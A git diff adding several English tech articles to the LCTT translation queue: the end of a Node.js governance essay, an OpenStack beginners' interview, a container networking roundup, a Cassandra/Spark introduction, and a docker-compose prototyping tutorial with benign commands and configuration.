+Another benefit of growing the committer base is that there’s more people to deal with little things, like redirecting issues to other repos, or adding metadata to issues and PRs. This allows developers who are more specialized to focus on just a narrow subset of work rather than triaging issues.
+
+Please be courteous and respectful; every participant is expected to follow the project's Code of Conduct.
+
+One thing that can burn out a project is when people show up with a lot of hostility and entitlement. Most of the time this sentiment comes from a feeling that their input isn’t valued. No matter what, a few people will show up who are used to more hostile environments and it’s good to have these kinds of expectations explicit and written down.
+
+And each project should have a Code of Conduct, which is an extension of these expectations that makes people feel safe and respected.
+
+### Contributions
+
+Any change to resources in this repository must be through pull requests. This applies to all changes to documentation, code, binary files, etc. Even long term committers and TC members must use pull requests.
+
+No pull request can be merged without being reviewed.
+
+Every change needs to be a pull request.
+
+A Pull Request captures the entire discussion and review of a change. Allowing some subset of committers to slip things in without a Pull Request gives the impression to potential contributors that they can't be involved in the project because they don't have access to a behind-the-scenes process or culture.
+
+This isn’t just a good practice, it’s a necessity in order to be transparent enough to attract new contributors.
+
+For non-trivial contributions, pull requests should sit for at least 36 hours to ensure that contributors in other timezones have time to review. Consideration should also be given to weekends and other holiday periods to ensure active committers all have reasonable time to become involved in the discussion and review process if they wish.
+
+Part of being open and inviting to more contributors is making the process accessible to people in timezones all over the world. We don't want to add an artificial delay to small doc changes, but any change that needs a bit of consideration must give people in different parts of the world time to consider it.
+
+In Node.js we actually have an even longer timeline than this, 48 hours on weekdays and 72 on weekends. That might be too much for smaller projects so it is shorter in this base policy but as a project grows it may want to increase this as well.
+
+The default for each contribution is that it is accepted once no committer has an objection. During review committers may also request that a specific contributor who is most versed in a particular area gives a “LGTM” before the PR can be merged. There is no additional “sign off” process for contributions to land. Once all issues brought by committers are addressed it can be landed by any committer.
+
+A key part of the liberal contribution policies we’ve been building is an inversion of the typical code review process. Rather than the default mode for a change to be rejected until enough people sign off, we make the default for every change to land. This puts the onus on reviewers to note exactly what adjustments need to be made in order for it to land.
+
+For new contributors it’s a big leap just to get that initial code up and sent. Viewing the code review process as a series of small adjustments and education, rather than a quality control hierarchy, does a lot to encourage and retain these new contributors.
+
+It’s important not to build processes that encourage a project to be too top heavy, with a few people needing to sign off on every change. Instead, we just mention any committer that we think should weigh in on a specific review. In Node.js we have people who are the experts on OpenSSL; any change to crypto is going to need an LGTM from them. This kind of expertise forms naturally as a project grows and this is a good way to work with it without burning people out.
+
+In the case of an objection being raised in a pull request by another committer, all involved committers should seek to arrive at a consensus by way of addressing concerns being expressed by discussion, compromise on the proposed change, or withdrawal of the proposed change.
+
+This is what we call a lazy consensus seeking process. Most review comments and adjustments are uncontroversial and the process should optimize for getting them in without unnecessary process. When there is disagreement, try to reach an easy consensus among the committers. More than 90% of the time this is simple, easy and obvious.
+
+If a contribution is controversial and committers cannot agree about how to get it to land or if it should land then it should be escalated to the TC. TC members should regularly discuss pending contributions in order to find a resolution. It is expected that only a small minority of issues be brought to the TC for resolution and that discussion and compromise among committers be the default resolution mechanism.
+
+For the minority of changes that are controversial and don’t reach an easy consensus we escalate that to the TC. These are rare but when they do happen it’s good to reach a resolution quickly rather than letting things fester. Contentious issues tend to get a lot of attention, especially by those more casually involved in the project or even entirely outside of it, but they account for a relatively small amount of what the project does every day.
+
+### Becoming a Committer
+
+All contributors who land a non-trivial contribution should be on-boarded in a timely manner, added as a committer, and given write access to the repository.
+
+This is where we diverge sharply from open source tradition.
+
+Projects have historically guarded commit rights to their version control system. This made a lot of sense when we were using version control systems like subversion. A single contributor can inadvertently mess up a project pretty badly in older version control systems, but not so much in git. In git, there isn’t a lot that can’t be fixed and so most of the quality controls we put on guarding access are no longer necessary.
+
+Not every committer has the rights to release or make high level decisions, so we can be much more liberal about giving out commit rights. That increases the committer base for code review and bug triage. As the range of expertise in the committer pool widens, smaller changes are reviewed and adjusted without the intervention of the more technical contributors, who can spend their time on reviews only they can do.
+
+This is the key to scaling contribution growth: committer growth.
+
+Committers are expected to follow this policy and continue to send pull requests, go through proper review, and have other committers merge their pull requests.
+
+This part is entirely redundant, but on purpose. It's just a reminder that even once someone is a committer, their changes still flow through the same process they followed before.
+
+### TC Process
+
+The TC uses a “consensus seeking” process for issues that are escalated to the TC. The group tries to find a resolution that has no open objections among TC members. If a consensus cannot be reached that has no objections then a majority wins vote is called. It is also expected that the majority of decisions made by the TC are via a consensus seeking process and that voting is only used as a last-resort.
+
+The best solution tends to be the one everyone can agree to so you would think that consensus systems would be the norm. However, **pure consensus** systems incentivize obstructionism which we need to avoid.
+
+In pure consensus everyone essentially has a veto. So, if I don’t want something to happen I’m in a strong position of power over everyone that wants something to happen. They have to convince me, and I don’t have to convince anyone else of anything.
+
+To avoid this we use a system called “consensus seeking” which has a long history outside of open source. It’s quite simple, just attempt to reach a consensus, if a consensus can’t be reached then call for a majority wins vote.
+
+Just the fact that a vote **is a possibility** means that people can't be obstructionists. Whether someone favors a change or not, they have to convince their peers, and if they aren't willing to put in the work to convince their peers then they probably won't involve themselves in that decision at all.
+
+The way these incentives play out is pretty impressive. We started using this process in io.js and adopted it in Node.js when we merged into the foundation. In that entire time we’ve never actually had to call for a vote, just the fact that we could is enough to keep everyone working together to find a solution and move forward.
+
+Resolution may involve returning the issue to committers with suggestions on how to move forward towards a consensus. A meeting of the TC is not expected to resolve all issues on its agenda during that meeting; the TC may prefer to let the discussion continue among the committers.
+
+A TC tries to resolve things in a timely manner so that people can make progress but often it’s better to provide some additional guidance that pushes the greater contributorship towards resolution without being heavy handed.
+
+Avoid creating big decision hierarchies. Instead, invest in a broad, growing and empowered contributorship that can make progress without intervention. We need to view a constant need for intervention by a few people to make any and every tough decision as the biggest obstacle to healthy Open Source.
+
+Members can be added to the TC at any time. Any committer can nominate another committer to the TC and the TC uses its standard consensus seeking process to evaluate whether or not to add this new member. Members who do not participate consistently at the level of a majority of the other members are expected to resign.
+
+The TC just uses the same consensus seeking process for adding new members as it uses for everything else.
+
+It’s a good idea to encourage committers to nominate people to the TC and not just wait around for TC members to notice the impact some people are having. Listening to the broader committers about who they see as having a big impact keeps the TC’s perspective in line with the rest of the project.
+
+As a project grows it’s important to add people from a variety of skill sets. If people are doing a lot of docs work, or test work, treat the investment they are making as equally valuable as the hard technical stuff.
+
+Projects should have the same ladder, user -> contributor -> committer -> TC member, for every skill set they want to build into the project to keep it healthy.
+
+I often see long time maintainers worry about adding people who don’t understand every part of the project, as if they have to be involved in every decision. The reality is that people do know their limitations and want to defer hard decisions to people they know have more experience.
+
+Thanks to Greg [Wallace][5] and ashley [williams][6].
+
+--------------------------------------------------------------------------------
+
+via: https://www.linux.com/news/biz-os/governance/892141-healthy-open-source
+
+作者:[Mikeal Rogers][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.linux.com/community/forums/person/66928
+
+
+[1]: https://medium.com/@nodejs/node-js-foundation-to-add-express-as-an-incubator-project-225fa3008f70#.mc30mvj4m
+[2]: https://github.com/nodejs/TSC/blob/master/BasePolicies/CONTRIBUTING.md
+[3]: https://github.com/nodejs/TSC/issues
+[4]: https://github.com/Level/community/blob/master/CONTRIBUTING.md
+[5]: https://medium.com/@gtewallaceLF
+[6]: https://medium.com/@ag_dubs
diff --git a/sources/tech/20160416 A newcomer's guide to navigating OpenStack Infrastructure.md b/sources/tech/20160416 A newcomer's guide to navigating OpenStack Infrastructure.md
new file mode 100644
index 0000000000..4fa50b0a45
--- /dev/null
+++ b/sources/tech/20160416 A newcomer's guide to navigating OpenStack Infrastructure.md
@@ -0,0 +1,87 @@
+A newcomer's guide to navigating OpenStack Infrastructure
+===========================================================
+
+New contributors to OpenStack are welcome, but having a road map for navigating within this maturing, fast-paced open source community doesn't hurt. At OpenStack Summit in Austin, [Paul Belanger][1] (Red Hat, Inc.), [Elizabeth K. Joseph][2] (HPE), and [Christopher Aedo][3] (IBM) will lead a session on [OpenStack Infrastructure for Beginners][4]. In this interview, they offer tips and resources to help onboard new OpenStack contributors.
+
+![](https://opensource.com/sites/default/files/images/life/Interview%20banner%20Q%26A.png)
+
+**Your talk description says you'll be "diving into the heart of infrastructure and explain everything you need to know about the systems that keep OpenStack working." That's a tall order for a 40-minute time slot. What are the top things beginners should know about OpenStack infrastructure?**
+
+**Elizabeth K. Joseph (EKJ)**: We don't use GitHub for OpenStack patches. This is something that trips up a lot of new contributors because we do maintain mirrors of all our repositories on GitHub for historical reasons. Instead we use a fully open source code review and continuous integration (CI) system maintained by the OpenStack Infrastructure team. Relatedly, since we run a CI system, every change proposed to OpenStack is tested before merging.
+
+**Paul Belanger (PB)**: There are a lot of passionate people in the project, so don't get discouraged if your patch gets a -1.
+
+**Christopher Aedo (CA)**: The community wants to help you succeed; don't be afraid to ask questions or ask for pointers to more information to improve your understanding.
+
+### Which online resources would you recommend for beginners to fill in the holes for what you can't cover in your talk?
+
+**PB**: Definitely our [OpenStack Project Infrastructure documentation][5]. A lot of effort has gone into keeping it as up to date as possible. Every system used in running OpenStack as a project has a dedicated page, even the OpenStack cloud the Infrastructure team is bringing online.
+
+**EKJ**: I'll echo what Paul said about the Infrastructure documentation, and add that we love seeing patches from folks who are learning. We often don't realize what we're missing in terms of documentation until someone asks. So read, learn, and then help us fill in the gaps. You can ask questions on the [openstack-infra mailing list][6] or in our IRC channel at #openstack-infra on Freenode.
+
+**CA**: I love [this detailed post][7] about building images, by Ian Wienand.
+
+### Which "gotchas" should new OpenStack contributors look out for?
+
+**EKJ**: Contributing is not just about submitting new code and new features; the OpenStack community places a very high value on doing code reviews. If you want people to look at a patch you submitted, consider reviewing some of the work of others and providing clear and constructive feedback. The more your fellow contributors know about your work and see you doing reviews, the more likely you'll get your code reviewed in a timely manner.
+
+**CA**: I see a lot of newcomers getting tripped up with [Gerrit][8]. Read through the [developer workflow][9] in the Developers Guide, and then maybe read through it one more time. If you're not used to Gerrit, it can seem confusing and overwhelming at first, but walking through a few code reviews usually makes it all come together. Also, I'm a big fan of IRC. It can be a great place to get help, but it's best if you can maintain a persistent presence so people can answer your questions even if you're not "there" at that particular moment. (Read [IRC, the secret to success in open source][10].) You don't need to be "always on," but the ability to easily scroll back in a channel and catch up on a conversation can be invaluable.
+
+**PB**: I agree with both Elizabeth and Chris—Gerrit is what to look out for. It is going to be the hub of your development effort. Not only will you be submitting code for people to review, but you'll also be reviewing other contributors' code. Watch out for the Gerrit UI; it can be confusing at times. I'd recommend trying out [Gertty][11], which is a console-based interface to the Gerrit Code Review system, which happens to be a project driven by OpenStack Infrastructure.
+
+### What resources do you recommend for beginners to help them network with other OpenStack contributors?
+
+**PB**: For me, it was using IRC and joining the #openstack-infra channel on Freenode ([IRC logs][12]). There is a lot of fantastic information and people in that channel. You get to see the day-to-day operations of the OpenStack project, and once you know how the project works, you'll have a better understanding on how to contribute to its future.
+
+**CA**: I want to second that note for IRC; staying on IRC throughout the day made a huge difference for me in terms of feeling informed and connected. It's also such a great way to get help when you're stuck with someone on one of the projects—the ones with active IRC channels always have someone around willing to get your issues sorted out.
+
+**EKJ**: The [openstack-dev mailing list][13] is quite important for staying up to date with news about projects you're working on inside of OpenStack, so I recommend subscribing to that. The mailing list uses subject tags to separate projects, so you can instruct your email client to use those and focus on threads that impact projects you care about. Beyond online resources, many OpenStack groups have popped up all over the world that serve the needs of both users and contributors to OpenStack, and many of them routinely have talks and events with key OpenStack contributors. You can search on Meetup.com in your area, or search on [groups.openstack.org][14] to see if there is an OpenStack group in your area. Finally, there are the [OpenStack Summits][15], which happen every six months, and where we'll be giving our Infrastructure talk. In their current format, the summits consist of both a user conference and a developer conference in one space to talk about everything related to OpenStack, past, present, and future.
+
+### In which areas does OpenStack need to improve to become more beginner-friendly?
+
+**PB**: I think our [account-setup][16] process could be made easier for new contributors, especially the number of steps needed to submit your first patch. There is a large cost to enrolling in the OpenStack development model, which may be too much for some contributors; however, once enrolled, the model works fantastically for developers.
+
+**CA**: We have a very pro-developer community, but the focus is on developing OpenStack itself, with less consideration given to the users of OpenStack clouds. We need to bring in application developers and encourage more people to develop things that run beautifully on OpenStack clouds, and encourage them to share those apps in the [Community App Catalog][17]. We can do this by continuing to improve our API standards and by ensuring different libraries (like libcloud, phpopencloud, and others) continue to work reliably for developers. Oh, also by sponsoring more OpenStack hackathons! All these things can ease entry for newcomers, which will lead to them sticking around.
+
+**EKJ**: I've worked on open source software for many years, but for a large number of OpenStack developers, this is the first open source project they've ever worked on. I've found that their proprietary software background doesn't prepare them for the open source ideals, methodologies, and collaboration techniques used in an open source project. I'd love to see us do a better job of welcoming people who have this proprietary software background and working with them so they can truly understand the value of what they're working on in the open source software community.
+
+### I think 2016 is shaping up to be the Year of the Open Source Haiku. Explain OpenStack to beginners via Haiku.
+
+**PB**: OpenStack runs clouds / If you enjoy free software / Submit your first patch
+
+**CA**: In the near future / OpenStack will rule the world / Help make it happen!
+
+**EKJ**: OpenStack is free / Deploy on your own servers / And run your own cloud!
+
+*Paul, Elizabeth, and Christopher* will be [speaking at OpenStack Summit][18] in Austin on Monday, April 25, starting at 11:15am.
+
+
+------------------------------------------------------------------------------
+
+via: https://opensource.com/business/16/4/interview-openstack-infrastructure-beginners
+
+作者:[linux.com][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: http://rikkiendsley.com/
+[1]: https://twitter.com/pabelanger
+[2]: https://twitter.com/pleia2
+[3]: https://twitter.com/docaedo
+[4]: https://www.openstack.org/summit/austin-2016/summit-schedule/events/7337
+[5]: http://docs.openstack.org/infra/system-config/
+[6]: http://lists.openstack.org/cgi-bin/mailman/listinfo/openstack-infra
+[7]: https://www.technovelty.org/openstack/image-building-in-openstack-ci.html
+[8]: https://code.google.com/p/gerrit/
+[9]: http://docs.openstack.org/infra/manual/developers.html#development-workflow
+[10]: https://developer.ibm.com/opentech/2015/12/20/irc-the-secret-to-success-in-open-source/
+[11]: https://pypi.python.org/pypi/gertty
+[12]: http://eavesdrop.openstack.org/irclogs/%23openstack-infra/
+[13]: http://lists.openstack.org/cgi-bin/mailman/listinfo/openstack-dev
+[14]: https://groups.openstack.org/
+[15]: https://www.openstack.org/summit/
+[16]: http://docs.openstack.org/infra/manual/developers.html#account-setup
+[17]: https://apps.openstack.org/
+[18]: https://www.openstack.org/summit/austin-2016/summit-schedule/events/7337
diff --git a/sources/tech/20160511 4 Container Networking Tools to Know.md b/sources/tech/20160511 4 Container Networking Tools to Know.md
new file mode 100644
index 0000000000..5b80791c6f
--- /dev/null
+++ b/sources/tech/20160511 4 Container Networking Tools to Know.md
@@ -0,0 +1,63 @@
+4 Container Networking Tools to Know
+=======================================
+
+![](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/network-crop.jpeg?itok=Na1tb9aR)
+>[Creative Commons Zero][1]
+
+With so many new cloud computing technologies, tools, and techniques to keep track of, it can be hard to know where to start learning new skills. This series on [next-gen cloud technologies][2] aims to help you get up to speed on the important projects and products in emerging and rapidly changing areas such as software-defined networking (SDN), containers, and the space where they coincide: container networking.
+
+The relationship between containers and networks remains challenging for enterprise container deployment. Containers need networking functionality to connect distributed applications. Part of the challenge, according to a recent [Enterprise Networking Planet][3] article, is “to deploy containers in a way that provides the isolation they need to function as their own self-contained data environments while still maintaining effective connectivity.”
+
+[Docker][4], the popular container platform, uses software-defined virtual networks to connect containers with the local network. Additionally, it uses Linux bridging features and virtual extensible LAN (VXLAN) technology so containers can communicate with each other in the same Swarm, or cluster. Docker’s plug-in architecture also allows other network management tools, such as those listed below, to control containers.
+
+Innovation in container networking has enabled containers to connect with other containers across hosts. This enables developers to start an application in a container on a host in a development environment and transition it across testing and then into a production environment, enabling continuous integration, agility, and rapid deployment.
+
+Container networking tools help accomplish container networking scalability, mainly by:
+
+1) enabling complex, multi-host systems to be distributed across multiple container hosts.
+
+2) enabling orchestration for container systems spanning a tremendous number of hosts across multiple public and private cloud platforms.
+
+![](https://www.linux.com/sites/lcom/files/styles/floated_images/public/john-willis_k.jpg?itok=lTsH9eqI)
+>John Willis speaking at Open Networking Summit 2016.
+
+For more information, check out the [Docker Networking Tutorial][5] video, which was presented by Brent Salisbury and John Willis at the recent [Open Networking Summit (ONS)][6]. This and many other ONS keynotes and presentations can be found [here][7].
+
+Container networking tools and projects you should know about include:
+
+[Calico][8] -- The Calico project (from [Metaswitch][9]) leverages Border Gateway Protocol (BGP) and integrates with cloud orchestration systems for secure IP communication between virtual machines and containers.
+
+[Flannel][10] -- Flannel (previously called rudder) from [CoreOS][11] provides an overlay network that can be used as an alternative to existing SDN solutions.
+
+[Weaveworks][12] -- The Weaveworks projects for managing containers include [Weave Net][13], Weave Scope, and Weave Flux. Weave Net is a tool for building and deploying Docker container networks.
+
+[Canal][14] -- Just this week, CoreOS and Tigera announced the formation of a new open source project called Canal. According to the announcement, the Canal project aims to combine aspects of Calico and Flannel, "weaving security policy into both the network fabric and the cloud orchestrator."
+
+You can learn more about container management, software-defined networking, and other next-gen cloud technologies through The Linux Foundation’s free “Cloud Infrastructure Technologies” course -- a massively open online course being offered through edX. [Registration for this course is open now][15], and course content will be available in June.
+
+--------------------------------------------------------------------------------
+
+via: https://www.linux.com/news/4-container-networking-tools-know
+
+作者:[AMBER ANKERHOLZ][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: https://www.linux.com/users/aankerholz
+[1]: https://www.linux.com/licenses/category/creative-commons-zero
+[2]: https://www.linux.com/news/5-next-gen-cloud-technologies-you-should-know
+[3]: http://www.enterprisenetworkingplanet.com/datacenter/datacenter-blog/container-networking-challenges-for-the-enterprise.html
+[4]: https://docs.docker.com/engine/userguide/networking/dockernetworks/
+[5]: https://youtu.be/Le0bEg4taak
+[6]: http://events.linuxfoundation.org/events/open-networking-summit
+[7]: https://www.linux.com/watch-videos-from-ons2016
+[8]: https://www.projectcalico.org/
+[9]: http://www.metaswitch.com/cloud-network-virtualization
+[10]: https://coreos.com/blog/introducing-rudder/
+[11]: https://coreos.com/
+[12]: https://www.weave.works/
+[13]: https://www.weave.works/products/weave-net/
+[14]: https://github.com/tigera/canal
+[15]: https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-cloud-infrastructure-technologies?utm_source=linuxcom&utm_medium=article&utm_campaign=cloud%20mooc%20article%201
diff --git a/sources/tech/20160511 An introduction to data processing with Cassandra and Spark.md b/sources/tech/20160511 An introduction to data processing with Cassandra and Spark.md
new file mode 100644
index 0000000000..46331a9ae5
--- /dev/null
+++ b/sources/tech/20160511 An introduction to data processing with Cassandra and Spark.md
@@ -0,0 +1,51 @@
+Translating KevinSJ
+An introduction to data processing with Cassandra and Spark
+==============================================================
+
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/images/life/osdc_520x292_opendata_0613mm.png?itok=mzC0Tb28)
+
+
+There's been a huge surge of interest around the Apache Cassandra database due to the increasing uptime and performance demands of modern cloud applications.
+
+So, what is Apache Cassandra? A distributed OLTP database built for high availability and linear scalability. When people ask what Cassandra is used for, think about the type of system you want close to the customer. This is ultimately the system that our users interact with. Applications that must always be available: product catalogs, IoT, medical systems, and mobile applications. In these categories downtime can mean loss of revenue or even more dire outcomes depending on your specific use case. Netflix was one of the earliest adopters of this project, which was open sourced in 2008, and their contributions, along with successes, put it on the radar of the masses.
+
+Cassandra became a top level Apache Software Foundation project in 2010 and has been riding the wave of popularity since then. Now even knowledge of Cassandra gets you serious returns in the job market. It's both crazy and awesome to consider that a NoSQL, open source technology could cause this sort of disruption next to the giants of enterprise SQL. This begs the question: what makes it so popular?
+
+Cassandra has the ability to be always on in spite of massive hardware and network failures by utilizing a design first widely discussed in [the Dynamo paper from Amazon][1]. By using a peer to peer model, with no single point of failure, we can survive rack failure and even complete network partitions. We can deal with an entire data center failure without impacting our customer's experience. A distributed system that plans for failure is a properly planned distributed system, because frankly, failures are just going to happen. With Cassandra, we accept that cruel fact of life, and bake it into the database's architecture and functionality.
+
+We know what you’re thinking: "But, I’m coming from a relational background, isn't this going to be a daunting transition?" The answer is somewhat yes and no. Data modeling with Cassandra will feel familiar to developers coming from the relational world. We use tables to model our data, and CQL, the Cassandra Query Language, to query the database. However, unlike SQL, Cassandra supports more complex data structures such as nested and user-defined types. For instance, instead of creating a dedicated table to store likes on a cat photo, we can store that data in a collection with the photo itself, enabling faster, sequential lookups. That's expressed very naturally in CQL. In our photo table we may want to track the name, URL, and the people that liked the photo.
+
+![](https://opensource.com/sites/default/files/resize/screen_shot_2016-05-06_at_7.17.33_am-350x198.png)
+
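+The screenshot above shows the real schema; as a minimal sketch, such a table could be declared in CQL roughly like this (the column names here are illustrative, not necessarily the exact ones in the image):
+
+```
+CREATE TABLE photos (
+    name text,
+    url text,
+    liked_by set<text>,   -- people that liked the photo, stored with the photo itself
+    PRIMARY KEY (name)
+);
+```
+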
+In a high performance system milliseconds matter for both user experience and for customer retention. Expensive JOIN operations limit our ability to scale out by adding unpredictable network calls. By denormalizing our data so it can be fetched in as few requests as possible, we profit from the trend of decreasing costs in disk space and in return get predictable, high performance applications. We embrace the concept of denormalization with Cassandra because it offers a pretty appealing tradeoff.
+
+We're obviously not just limited to storing likes on cat photos. Cassandra is optimized for high write throughput. This makes it the perfect solution for big data applications where we’re constantly ingesting data. Time series and IoT use cases are growing at a steady rate in both demand and appearance in the market, and we're continuously finding ways to utilize the data we collect to improve our technological application.
+
+This brings us to the next step: we've talked about storing our data in a modern, cost-effective fashion, but how do we get even more horsepower? Meaning, once we've collected all that data, what do we do with it? How can we analyze hundreds of terabytes efficiently? How can we react to information we're receiving in real-time, making decisions in seconds rather than hours? Enter Apache Spark.
+
+Spark is the next step in the evolution of big data processing. Hadoop and MapReduce were revolutionary projects, giving the big data world an opportunity to crunch all the data we've collected. Spark takes our big data analysis to the next level by drastically improving performance and massively decreasing code complexity. Through Spark, we can perform massive batch processing calculations, react quickly to stream processing, make smart decisions through machine learning, and understand complex, recursive relationships through graph traversals. It’s not just about offering your customers a fast and reliable connection to their application (which is what Cassandra offers), it's also about being able to leverage insights from the data Cassandra stores to make more intelligent business decisions and better cater to customer needs.
+
+You can check out the [Spark-Cassandra Connector][2] (open source) and give it a shot. To learn more about both technologies, we highly recommend the free self-paced courses on [DataStax Academy][3].
+
+Have fun digging in and learning some killer new technology! If you want to learn more, check out our [OSCON tutorial][4], with a hands on exploration into the worlds of both Cassandra and Spark.
+
+We also love taking questions on Twitter, so give us a shout and we’ll try to help: [Dani][5] and [Jon][6].
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/life/16/5/basics-cassandra-and-spark-data-processing
+
+作者:[Jon Haddad][a],[Dani Traphagen][b]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: https://twitter.com/rustyrazorblade
+[b]: https://opensource.com/users/dtrapezoid
+[1]: http://www.allthingsdistributed.com/files/amazon-dynamo-sosp2007.pdf
+[2]: https://github.com/datastax/spark-cassandra-connector
+[3]: https://academy.datastax.com/
+[4]: http://conferences.oreilly.com/oscon/open-source-us/public/schedule/detail/49162
+[5]: https://twitter.com/dtrapezoid
+[6]: https://twitter.com/rustyrazorblade
diff --git a/sources/tech/20160512 Rapid prototyping with docker-compose.md b/sources/tech/20160512 Rapid prototyping with docker-compose.md
new file mode 100644
index 0000000000..0c67223697
--- /dev/null
+++ b/sources/tech/20160512 Rapid prototyping with docker-compose.md
@@ -0,0 +1,142 @@
+
+Rapid prototyping with docker-compose
+========================================
+
+In this write-up we'll look at a Node.js prototype for **finding stock of the Raspberry PI Zero** from three major outlets in the UK.
+
+I wrote the code and deployed it to an Ubuntu VM in Azure within a single evening of hacking. Docker and the docker-compose tool made the deployment and update process extremely quick.
+
+### Remember linking?
+
+If you've already been through the [Hands-On Docker tutorial][1] then you will have experience linking Docker containers on the command line. Linking a Node hit counter to a Redis server on the command line may look like this:
+
+```
+$ docker run -d -P --name redis1 redis
+$ docker run -d -p 3000:3000 --link redis1:redis hit_counter
+```
+
+Now imagine your application has three tiers:
+
+- Web front-end
+- Batch tier for processing long running tasks
+- Redis or mongo database
+
+Explicit linking through `--link` is just about manageable with a couple of containers, but can get out of hand as we add more tiers or containers to the application.
+
+### Enter docker-compose
+
+![](http://blog.alexellis.io/content/images/2016/05/docker-compose-logo-01.png)
+>Docker Compose logo
+
+The docker-compose tool is part of the standard Docker Toolbox and can also be downloaded separately. It provides a rich set of features to configure all of an application's parts through a plain-text YAML file.
+
+The above example would look like this:
+
+```
+version: "2.0"
+services:
+ redis1:
+ image: redis
+ hit_counter:
+ build: ./hit_counter
+ ports:
+ - 3000:3000
+```
+
+From Docker 1.10 onwards we can take advantage of network overlays to help us scale out across multiple hosts. Prior to this, linking only worked across a single host. The `docker-compose scale` command can be used to bring on more computing power as the need arises, as sketched below.
+
+>View the [docker-compose][2] reference on docker.com
+
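+As a quick sketch of that command (the `worker` service name here is hypothetical), this is how you would run three copies of a worker-style service. Note that a service publishing a fixed host port, such as `3000:3000` above, can only run one instance per host:
+
+```
+$ docker-compose scale worker=3
+```
+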
+### Real-world example: Raspberry PI Stock Alert
+
+![](http://blog.alexellis.io/content/images/2016/05/Raspberry_Pi_Zero_ver_1-3_1_of_3_large.JPG)
+>The new Raspberry PI Zero v1.3 image courtesy of Pimoroni
+
+There is a huge buzz around the Raspberry PI Zero - a tiny microcomputer with a 1GHz CPU and 512MB RAM capable of running full Linux, Docker, Node.js, Ruby and many other popular open-source tools. One of the best things about the PI Zero is that it costs only 5 USD. That also means that stock gets snapped up really quickly.
+
+*If you want to try Docker or Swarm on the PI, check out the tutorial below.*
+
+>[Docker Swarm on the PI Zero][3]
+
+### Original site: whereismypizero.com
+
+I found a webpage which used screen scraping to find whether 4-5 of the most popular outlets had stock.
+
+- The site contained a static HTML page
+- Issued one XMLHttpRequest per outlet accessing /public/api/
+- The server issued the HTTP request to each shop and performed the scraping
+
+Every call to /public/api/ took 3 seconds to execute, and using Apache Bench (ab) I was only able to get through 0.25 requests per second.
+
+### Reinventing the wheel
+
+The retailers didn't seem to mind whereismypizero.com scraping their sites for stock, so I set about writing a similar tool from the ground up. I had the intention of handling a much higher number of requests per second through caching and de-coupling the scrape from the web tier. Redis was the perfect tool for the job. It allowed me to set an automatically expiring key/value pair (i.e. a simple cache) and also to transmit messages between Node processes through pub/sub.
+
+>Fork or star the code on Github: [alexellis/pi_zero_stock][4]
+
+If you've worked with Node.js before then you will know it is single-threaded and that any CPU intensive tasks such as parsing HTML or JSON could lead to a slow-down. One way to mitigate that is to use a second worker process and a Redis messaging channel as connective tissue between this and the web tier.
+
+- Web tier
+  - Gives 200 for cache hit (Redis key exists for store)
+  - Gives 202 for cache miss (Redis key doesn't exist, so issues message)
+  - Since we are only ever reading a Redis key, the response time is very quick.
+- Stock Fetcher
+  - Performs HTTP request
+  - Scrapes for different types of web stores
+  - Updates a Redis key with a cache expire of 60 seconds
+  - Also locks a Redis key to prevent too many in-flight HTTP requests to the web stores.
+
+```
+version: "2.0"
+services:
+ web:
+ build: ./web/
+ ports:
+ - "3000:3000"
+ stock_fetch:
+ build: ./stock_fetch/
+ redis:
+ image: redis
+```
+
+*The docker-compose.yml file from the example.*
+
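+The real implementation lives in the repository linked above, but as a rough sketch of the web tier's cache-hit/cache-miss behaviour described earlier (the variable names, key prefix, and pub/sub channel here are illustrative, not the project's actual code):
+
+```
+var express = require('express');
+var redis = require('redis');
+
+var app = express();
+var cache = redis.createClient(6379, 'redis');   // 'redis' service name from docker-compose.yml
+var pub = redis.createClient(6379, 'redis');
+
+app.get('/api/:store', function (req, res) {
+    cache.get('stock_' + req.params.store, function (err, value) {
+        if (value) {
+            res.status(200).send(value);                      // cache hit: Redis key exists
+        } else {
+            pub.publish('fetch_requests', req.params.store);  // ask the stock fetcher to scrape
+            res.status(202).send('{"status": "pending"}');    // cache miss
+        }
+    });
+});
+
+app.listen(3000);
+```
+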
+Once I had this working locally, deploying to an Ubuntu 16.04 image in the cloud (Azure) took less than 5 minutes. I logged in, cloned the repository and typed in `docker-compose up -d`. That was all it took - rapid prototyping a whole system doesn't get much better. Anyone (including the owner of whereismypizero.com) can deploy the new solution with just two lines:
+
+```
+$ git clone https://github.com/alexellis/pi_zero_stock
+$ docker-compose up -d
+```
+
+Updating the site is easy and just involves a `git pull` followed by a `docker-compose up -d` with the `--build` argument passed along.
+
+If you are still linking your Docker containers manually, try Docker Compose for yourself or my code below:
+
+>Fork or star the code on Github: [alexellis/pi_zero_stock][5]
+
+### Check out the test site
+
+The test site is currently deployed using docker-compose.
+
+>[stockalert.alexellis.io][6]
+
+![](http://blog.alexellis.io/content/images/2016/05/Screen-Shot-2016-05-16-at-22-34-26-1.png)
+
+Preview as of 16th of May 2016
+
+----------
+via: http://blog.alexellis.io/rapid-prototype-docker-compose/
+
+作者:[Alex Ellis][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: http://blog.alexellis.io/author/alex/
+[1]: http://blog.alexellis.io/handsondocker
+[2]: https://docs.docker.com/compose/compose-file/
+[3]: http://blog.alexellis.io/dockerswarm-pizero/
+[4]: https://github.com/alexellis/pi_zero_stock
